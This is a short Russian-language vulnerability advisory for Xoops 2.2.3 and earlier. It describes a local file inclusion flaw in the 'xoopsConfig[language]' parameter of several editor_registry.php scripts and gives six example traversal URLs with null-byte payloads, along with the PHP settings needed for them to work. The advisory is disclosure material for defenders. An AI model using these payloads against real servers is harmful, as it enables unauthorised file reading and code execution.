Программа: Xoops 2.2.3 и более ранние версии 

Уязвимость позволяет удаленному пользователю просмотреть или выполнить произвольные локальные файлы на системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "xoopsConfig[language]" в сценарии "class/xoopseditor/textarea/editor_registry.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный локальный файл на системе. 

Пример:

http://[target]/[path_to_xoops]/class/xoopseditor/ textarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../script

http://[target]/[path_to_xoops]/class/xoopseditor/ textarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../boot.ini%00

http://[target]/[path_to_xoops]/class/xoopseditor/ koivi/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../script

http://[target]/[path_to_xoops]/class/xoopseditor/ koivi/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../boot.ini%00

http://[target]/[path_to_xoops]/class/xoopseditor/ dhtmltextarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../script

http://[target]/[path_to_xoops]/class/xoopseditor/ dhtmltextarea/editor_registry.php?xoopsConfig[language]=
../../../../../../../../../../boot.ini%00 

Для успешной эксплуатации уязвимости, опция "magic_quotes_gpc" должна быть выключена, а опция “register_globals” - включена.

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии